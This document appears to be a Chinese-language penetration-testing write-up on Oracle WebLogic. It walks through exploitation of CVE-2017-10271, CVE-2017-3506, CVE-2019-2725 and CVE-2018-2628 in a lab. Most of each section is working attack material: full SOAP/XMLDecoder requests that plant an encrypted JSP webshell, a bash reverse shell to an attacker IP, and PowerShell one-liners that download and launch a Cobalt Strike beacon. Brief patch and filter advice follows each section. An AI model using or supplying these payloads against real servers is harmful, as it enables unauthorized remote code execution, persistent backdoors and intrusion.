weblogic 12.1.3配置
进入该目录下启动,这里不再需要输入账号密码
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
image-20210814170531939
成功搭建,可正常访问。
三.weblogic渗透总结
1.XMLDecoder 反序列化漏洞 CVE-2017-10271
漏洞简介
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
影响版本
10.3.6.0 12.1.3.0.0 12.2.1.1.0
验证漏洞
当访问该路径 /wls-wsat/CoordinatorPortType (POST),出现如下图所示的回显时,只要是在wls-wsat包中的皆受到影响,可以查看web.xml查看所有受影响的url,说明存在该漏洞;
image-20210809140942304
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war\WEB-INF
进行该路径查看web.xml;
image-20210809141314849
image-20210809141512699
总结下来就是下面这些url会受到影响;
/wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11
漏洞复现
抓包,修改内容
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/zcc.jsp</string> <void method="println"> <string> <![CDATA[ <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
image-20210809162737924
image-20210809162717485
实现Linux反弹shell的poc:
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: x.x.x.x:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 637 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i >& /dev/tcp/x.x.x.x/4444 0>&1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
实现win上线cs
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.10.154:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 704 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>powershell</string> </void> <void index="1"> <string>-Command</string> </void> <void index="2"> <string>(new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc.exe','zcc.exe');start-process zcc.exe</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
cs生成后门木马
image-20210810105923024
放在kali上,开启简易的http服务
image-20210810110037377
powershell上线cs:
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc.exe','zcc.exe');start-process zcc.exe
image-20210810111100065
image-20210810110916447
成功上线cs
安全防护
前往Oracle官网下载10月份所提供的安全补丁:
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
2.XMLDecoder 反序列化漏洞 CVE-2017-3506
漏洞简介
cve-2017-10271与3506他们的漏洞原理是一样的,只不过10271绕过了3506的补丁,CVE-2017-3506的补丁加了验证函数,验证Payload中的节点是否存在object Tag。
private void validate(InputStream is){ WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory(); try { SAXParser parser =factory.newSAXParser(); parser.parse(is, newDefaultHandler() { public void startElement(String uri, StringlocalName, String qName, Attributes attributes)throws SAXException { if(qName.equalsIgnoreCase("object")) { throw new IllegalStateException("Invalid context type: object"); } } }); } catch(ParserConfigurationException var5) { throw new IllegalStateException("Parser Exception", var5); } catch (SAXExceptionvar6) { throw new IllegalStateException("Parser Exception", var6); } catch (IOExceptionvar7) { throw new IllegalStateException("Parser Exception", var7); } }
影响版本
10.3.6.0 12.1.3.0 12.2.1.0 12.2.1.1 12.2.1.2
漏洞复现
利用的poc:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/zcc3.jsp</string> <void method="println"> <string> <![CDATA[ <% out.print("zcc1 hello"); %> ]]> </string> </void> <void method="close"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
image-20210810141515224
安全防护
前往Oracle官网下载10月份所提供的安全补丁:
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
3.wls-wsat反序列化远程代码执行漏洞 CVE-2019-2725
漏洞简介
此漏洞实际上是CVE-2017-10271的又一入口,CVE-2017-3506的补丁过滤了object;CVE-2017-10271的补丁过滤了new,method标签,且void后面只能跟index,array后面只能跟byte类型的class;CVE-2019-2725的补丁过滤了class,限制了array标签中的byte长度。
影响组件
bea_wls9_async_response.war wsat.war
影响版本
10.3.* 12.1.3
验证漏洞
访问 /_async/AsyncResponseService,返回200则存在,404则不存在
查看web.xml得知受影响的url如下:
访问路径为:
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\WEB-INF
image-20210810143210331
/_async/AsyncResponseService /_async/AsyncResponseServiceJms /_async/AsyncResponseServiceHttps /_async/AsyncResponseServiceSoap12 /_async/AsyncResponseServiceSoap12Jms /_async/AsyncResponseServiceSoap12Https
漏洞复现
访问该url,回显如下,说明存在漏洞
image-20210810142738800
win上线cs的poc如下,这里exe用的是上面生成的:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>powershell</string> </void> <void index="1"> <string>-Command</string> </void> <void index="2"> <string>(new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc1.exe','zcc1.exe');start-process zcc1.exe</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header><soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
安全防护
1、升级本地JDK环境
2、及时安装官方补丁
4.WebLogic T3协议反序列化命令执行漏洞 CVE-2018-2628
漏洞简介
远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server中执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行任意反序列化 payload 的目的。
影响版本
10.3.6.0 12.1.3.0 12.2.1.1 12.2.1.2
相关漏洞
CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 CVE-2018-2893 CVE-2016-0638
验证漏洞
使用脚本跑,脚本运行需python2环境,出现如下图所示的回显时,说明存在该漏洞;
脚本链接:https://github.com/shengqi158/CVE-2018-2628
image-20210810160702675
image-20210810160718697
漏洞复现
windows-getshell,使用k8weblogicGUI.exe
image-20210810163031055
这里出了点问题,文件名改成了1.jsp
image-20210810164738168
用脚本连接得到交互shell,脚本运行需python2环境
脚本链接:https://github.com/jas502n/CVE-2018-2628
image-20210810165228766
在此处上线cs,用的依旧是上面的马,改名zcc3.exe
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://192.168.10.65/zcc3.exe','zcc3.exe');start-process zcc3.exe
image-20210810170001387
image-20210810170039655
安全防护
过滤t3协议,再域结构中点击 安全->筛选器,选择筛选器填:
weblogic.security.net.ConnectionFilterImpl
image-20210813140332501
保存后重启weblogic即可。
